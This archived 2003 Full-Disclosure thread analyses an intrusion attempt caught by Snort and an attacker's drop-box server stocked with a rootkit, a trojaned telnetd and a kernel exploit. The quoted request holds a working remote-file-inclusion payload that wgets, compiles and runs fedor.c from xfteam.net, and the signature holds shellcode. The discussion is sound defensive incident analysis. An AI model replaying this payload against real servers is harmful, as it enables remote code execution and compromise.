| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3FC1D956.6010507@phrick.net> From: gml at phrick.net (gml) Subject: http://xfteam.net/fedor.c - Anyone seen this before?? I've attached a copy of the archive, I was able to retrieve it apparently. It's sd's client code for his tty shell, looks like you've stumbled on to someones private warez repository. The root of xfteam.net is just full of fun stuff Parent Directory <http://xfteam.net/> 20-Nov-2003 16:14 - c4 <http://xfteam.net/c4> 15-Nov-2003 10:49 19k cgi-bin/ <http://xfteam.net/cgi-bin/> 20-Nov-2003 16:13 - cmd.jpg.php <http://xfteam.net/cmd.jpg.php> 15-Nov-2003 10:49 1k cmd.txt <http://xfteam.net/cmd.txt> 15-Nov-2003 10:47 1k f <http://xfteam.net/f> 20-Nov-2003 13:01 28k fedor.c <http://xfteam.net/fedor.c> 15-Nov-2003 10:47 5k forum/ <http://xfteam.net/forum/> 04-Nov-2003 22:05 - google.jpg <http://xfteam.net/google.jpg> 19-Nov-2003 19:56 106k hax.gif <http://xfteam.net/hax.gif> 19-Nov-2003 23:38 1k iomash.c <http://xfteam.net/iomash.c> 16-Nov-2003 16:30 2k kmod <http://xfteam.net/kmod> 15-Nov-2003 10:47 17k mail/ <http://xfteam.net/mail/> 20-Nov-2003 16:13 - putty.exe <http://xfteam.net/putty.exe> 19-Nov-2003 12:36 220k remote.php <http://xfteam.net/remote.php> 15-Nov-2003 10:49 87k strings.txt <http://xfteam.net/strings.txt> 15-Nov-2003 10:44 3k telnetd <http://xfteam.net/telnetd> 16-Nov-2003 16:29 167k I'm of the opinion this is someones drop box, they drop off code they are going to later download and compile on a target machine from here. The file c4 is a suckit variant, also by SD very popular with the linux kids. kmod is ptrace-kmod.c in ELF. telnetd is what you would expect it's a trojaned telnetd binary. these binaries also appear to be infected with an RST variant: http://dump.cryptobeacon.net/papers/RST-Variant%20Analysis.txt, i wonder if your attacker knows this or not. if not i feel really bad for anyone he's attacked. who says unix virii aren't effective? yawn. char sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80"; Dan wrote: >Hi, >Our Snort picked up an interesting attempt to download, compile and execute. >Noting also the fact that the sub dir its attempting to access has not been >there for over 4 months(/logjam/)? > >Has anyone actually seen what this fedor.c is? I have done some google'ing but >it comes up blank. > >Has anyone else noticed this kindof request recently? > >Is it just me or is xfteam.net not resolving anyway? > >Orignal HTTP request: >GET /logjam/showhits.php? >rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f > >Breaking this down we get(twice): >uname -a >cd /tmp >wget http://xfteam.net/fedor.c >gcc -o f fedor.c >./f > > >Regards, >Daniel. > > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.netsys.com/full-disclosure-charter.html > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: unknown.gif Type: image/gif Size: 245 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/unknown.gif -------------- next part -------------- A non-text attachment was scrubbed... Name: folder.gif Type: image/gif Size: 225 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/folder.gif -------------- next part -------------- A non-text attachment was scrubbed... Name: text.gif Type: image/gif Size: 229 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/text.gif -------------- next part -------------- A non-text attachment was scrubbed... Name: c.gif Type: image/gif Size: 242 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/c.gif -------------- next part -------------- A non-text attachment was scrubbed... Name: image2.gif Type: image/gif Size: 309 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/image2.gif -------------- next part -------------- A non-text attachment was scrubbed... Name: binary.gif Type: image/gif Size: 246 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/binary.gif -------------- next part -------------- A non-text attachment was scrubbed... Name: xfteam.net.tar.gz Type: application/gzip Size: 336732 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/xfteam.net.tar.bin
Powered by blists - more mailing lists